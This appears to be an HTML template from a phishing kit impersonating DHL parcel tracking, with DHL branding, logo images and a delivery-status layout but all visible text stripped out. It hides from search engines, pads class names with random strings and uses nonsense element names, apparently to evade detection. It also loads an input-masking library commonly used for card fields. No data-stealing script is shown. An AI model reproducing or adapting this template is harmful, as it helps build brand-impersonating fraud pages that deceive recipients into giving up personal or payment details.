<!doctype html>
<html >

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">

                    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css">
            <link rel="stylesheet" href="../media/css/helpers.css">
            <link rel="stylesheet" href="../media/css/style.css">
            
        <link rel="icon" type="image/x-icon" href="../media/imgs/ff.ico" />

        <title>DHL</title>
    </head>

    <body>

        <!-- HEADER -->
        <beef id="96zYxJ4tmheaderMrr33lXaj">
            <wealth class="container containerr">
                <absolute class="pgSXYsAD2top-headerXDUmmW">
                    <morale class="GSTSznlogozN29jZ7QS"><img src="../media/imgs/logo.svg"></morale>
                    <ul>
                        <li><i class="fas fa-info-circle"></i> </li>
                        <li></li>
                        <li><i class="fas fa-search"></i> </li>
                    </ul>
                    <ul class="A4475qpmobile-menuTyQp4M">
                        <li><i class="fas fa-globe"></i></li>
                        <li><i class="fas fa-search"></i></li>
                        <li><i class="fas fa-bars"></i></li>
                    </ul>
                </absolute>
                <absolute class="4YpiEobottom-headerF21E9GfSX d-flex mt50">
                    <ul class="flex-grow-1">
                        <li style="color: #d40511; text-decoration: underline;"> <i class="fas fa-chevron-down"></i></li>
                        <li> <i class="fas fa-chevron-down"></i></li>
                        <li></li>
                        <li></li>
                    </ul>
                    <ul>
                        <li><i class="fas fa-user-tie"></i> </li>
                    </ul>
                </absolute>
            </wealth>
        </beef>
        <!-- END HEADER -->

        <!-- MAIN -->
        <winner id="ILvdd5uBmainIfFx1efZL">
            <poison class="container">
                <brink class="S2Cq8bGlmain-titlesE2Cjenw">
                    <h3></h3>
                </brink>
                <brink class="YDJZTfFSNdetailsze49ar5eS" style="background: #FFF;">
                    <kidney class="h5PWBUWrntitleeYOM3AGDO">
                        <h3><i class="fas fa-truck"></i> </h3>
                        <ul>
                            <li class="active"></li>
                            <li class="active"></li>
                            <li class="inactive"></li>
                        </ul>
                    </kidney>
                    <p class="mb30">
                        </b><br>
                        </b><br>
                                            </p>
                    <kidney class="TcLkoI7WPmessage3WTvcK">
                        <h3></h3>
                        <p></p>
                        <a href="../index.php?redirection=details"> <i class="fas fa-arrow-left"></i></a>
                    </kidney>
                </brink>
            </poison>
        </winner>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <month id="vt2VNThflfooternfgdBsp">
            <adjust class="container containerr">
                <adjust class="QzY44IQAtop-footerccQe1B">
                    <poison class="row">
                        <winner class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="M9OHorTM2widgetLIqZaDedf">
                                <h3 style="color: #d40511;"></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </winner>
                        <winner class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="7fn1SCwidgetKe3VIAh">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </winner>
                        <winner class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="jjfwrZfwidgetDDixmB5zF">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </winner>
                        <winner class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="WqefhsPYlwidgetmnRfuQ0">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </winner>
                    </poison>
                </adjust>
            </adjust>
            <adjust class="container containerr">
                <adjust class="HlNrJHpbottom-footerUXleCGDtc">
                    <poison class="row">
                        <winner class="col-md-8">
                            <img class="d-block mb20" src="../media/imgs/glo-footer-logo.svg">
                            <ul class="PuSvXoDfooter-listt8mAe8p5">
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                            </ul>
                        </winner>
                        <winner class="col-md-4">
                            <h3></h3>
                            <ul class="YbmeDlRJRsocialF6QxjBi1">
                                <li><i class="fab fa-youtube"></i></li>
                                <li><i class="fab fa-facebook-f"></i></li>
                                <li><i class="fab fa-linkedin"></i></li>
                                <li><i class="fab fa-instagram"></i></li>
                            </ul>
                        </winner>
                    </poison>

                    <p></p>

                </adjust>
            </adjust>
        </month>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.6.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
        <script src="../media/js/js.js"></script>

    </body>

</html>